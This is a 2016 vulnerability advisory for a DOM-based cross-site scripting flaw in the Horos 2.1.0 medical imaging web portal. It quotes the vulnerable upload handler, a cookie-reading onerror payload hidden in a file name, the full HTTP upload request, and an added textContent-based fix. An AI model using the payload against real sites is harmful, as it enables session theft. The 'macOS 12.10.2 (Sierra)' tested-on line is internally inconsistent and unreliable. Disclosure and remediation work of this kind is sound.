
Horos 2.1.0 Cross Site Scripting

Posted Dec 16, 2016
Authored by LiquidWorm | Site zeroscience.mk

Horos version 2.1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | c7d90c0d7ae5ab140e712c754c80c93be75248e57cb288a655e9b2ca4edaf000


Horos 2.1.0 Web Portal DOM Based XSS


Vendor: Horos Project
Product web page: https://www.horosproject.org
Affected version: 2.1.0

Summary: Horos is an open-source, free medical image viewer. The goal of the
Horos Project is to develop a fully functional, 64-bit medical image viewer for
OS X. Horos is based upon OsiriX and other open source medical imaging libraries.

Desc: Horos suffers from a DOM-based XSS vulnerability because it does not sanitize
user input before it reaches a dangerous HTML modification sink ((element).innerHTML).
This can be exploited to execute arbitrary HTML and script code in a user's browser DOM
in the context of the affected site.

Tested on: macOS 12.10.2 (Sierra)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5385
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5385.php


15.12.2016

--


------vuln-----

function fileSelected() {
    var file = document.getElementById('fileToUpload').files[0];
    if (file) {
        var fileSize = 0;
        if (file.size > 1024 * 1024)
            fileSize = (Math.round(file.size * 100 / (1024 * 1024)) / 100).toString() + 'MB';
        else
            fileSize = (Math.round(file.size * 100 / 1024) / 100).toString() + 'KB';

        document.getElementById('fileName').innerHTML = 'Name: ' + file.name; // xss
        document.getElementById('fileSize').innerHTML = 'Size: ' + fileSize;
        document.getElementById('fileType').innerHTML = 'Type: ' + file.type;
    }
}

function uploadFile()
{
    document.getElementById('progressbar').innerHTML = '0%';
    document.getElementById("progressbar").style.width = '0%';
    document.getElementById("progressbar").className = "progress-bar progress-bar-striped";
    document.getElementById("upload_button").className = "btn btn-default disabled";

    setTimeout(function(){

        var fd = new FormData();
        fd.append("fileToUpload", document.getElementById('fileToUpload').files[0]);
        var xhr = new XMLHttpRequest();
        xhr.upload.addEventListener("progress", uploadProgress, false);
        xhr.addEventListener("load", uploadComplete, false);
        xhr.addEventListener("error", uploadFailed, false);
        xhr.addEventListener("abort", uploadCanceled, false);
        xhr.open("POST", "", true);
        xhr.send(fd);

    }, 500);
}

...

<form class="col-md-12" id="form1" action="javascript:void(0);" method="post" enctype="multipart/form-data">
    <div class="form-group col-md-12">
        <label for="fileToUpload">File input</label>
        <input type="file" name="file" id="fileToUpload" onchange="fileSelected();">
        <div class="help-block">
            <div id="fileName"></div> <!-- xss -->
            <div id="fileSize"></div>
            <div id="fileType"></div>
        </div>
    </div>
    <div class="col-lg-2 col-md-3">
        <button type="submit" class="btn btn-default" id="upload_button" name="upload_button" onclick="uploadFile()" value="Upload">Upload</button>
    </div>
    <div class="col-lg-10 col-md-9 help-block">
        <div class="progress" id="progressbar_containter" style="display: none;">
            <div class="progress-bar progress-bar-striped" id="progressbar" role="progressbar" aria-valuenow="2" aria-valuemin="0" aria-valuemax="100" style="min-width: 2em;"></div>
        </div>
    </div>
</form>


------/vuln-----

Element output: <div id="fileName">Name: <img src="#" onerror="alert(document.cookie)" :="">.mp3</div>
Fix: (element).innerText or (element).textContent
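Hardened form of the fileSelected() handler quoted above, added here as an illustration and not taken from the Horos code base: the display strings are built by pure helpers and written to the page with textContent, so a file name carrying markup is rendered as literal text. formatFileSize, describeFile and escapeHtml are names chosen for this example.

```javascript
// Same size formatting as the original handler (rounded to two decimals),
// kept as a pure function so it can be checked without a browser DOM.
function formatFileSize(bytes) {
  if (bytes > 1024 * 1024) {
    return (Math.round(bytes * 100 / (1024 * 1024)) / 100).toString() + 'MB';
  }
  return (Math.round(bytes * 100 / 1024) / 100).toString() + 'KB';
}

// Builds the three display strings from a File-like object ({name, size, type}).
// The name is returned untouched: what makes it safe is the sink it goes to.
function describeFile(file) {
  return {
    name: 'Name: ' + file.name,
    size: 'Size: ' + formatFileSize(file.size),
    type: 'Type: ' + file.type,
  };
}

// Only for the case where markup must stay around untrusted text (e.g. a bold
// label) and innerHTML cannot be avoided: escape the HTML-significant characters.
function escapeHtml(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, (c) => map[c]);
}

// Safe replacement for the advisory's handler; needs the page's element ids.
function fileSelected() {
  const input = document.getElementById('fileToUpload');
  const file = input && input.files && input.files[0];
  if (!file) return;
  const info = describeFile(file);
  // textContent creates a text node: the string is never parsed as HTML,
  // so an <img onerror=...> in the file name cannot register a handler.
  document.getElementById('fileName').textContent = info.name;
  document.getElementById('fileSize').textContent = info.size;
  document.getElementById('fileType').textContent = info.type;
}
```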

PoC payload: <img src="#" onerror="alert(document.cookie)"/>:


POST /main HTTP/1.1
Host: 127.0.0.1:3333
Content-Length: 3
Origin: http://127.0.0.1:3333
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBUg5yXYbUF1w5AEi
Accept: */*
Referer: http://127.0.0.1:3333/main
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: OSID=53B11D55703E7A7DA14AF867B2C7E346
DNT: 1
Connection: close

------WebKitFormBoundaryBUg5yXYbUF1w5AEi
Content-Disposition: form-data; name="fileToUpload"; filename="<img src=%22#%22 onerror=%22alert(document.cookie)%22:>.mp3"
Content-Type: audio/mp3

ZSL
------WebKitFormBoundaryBUg5yXYbUF1w5AEi--
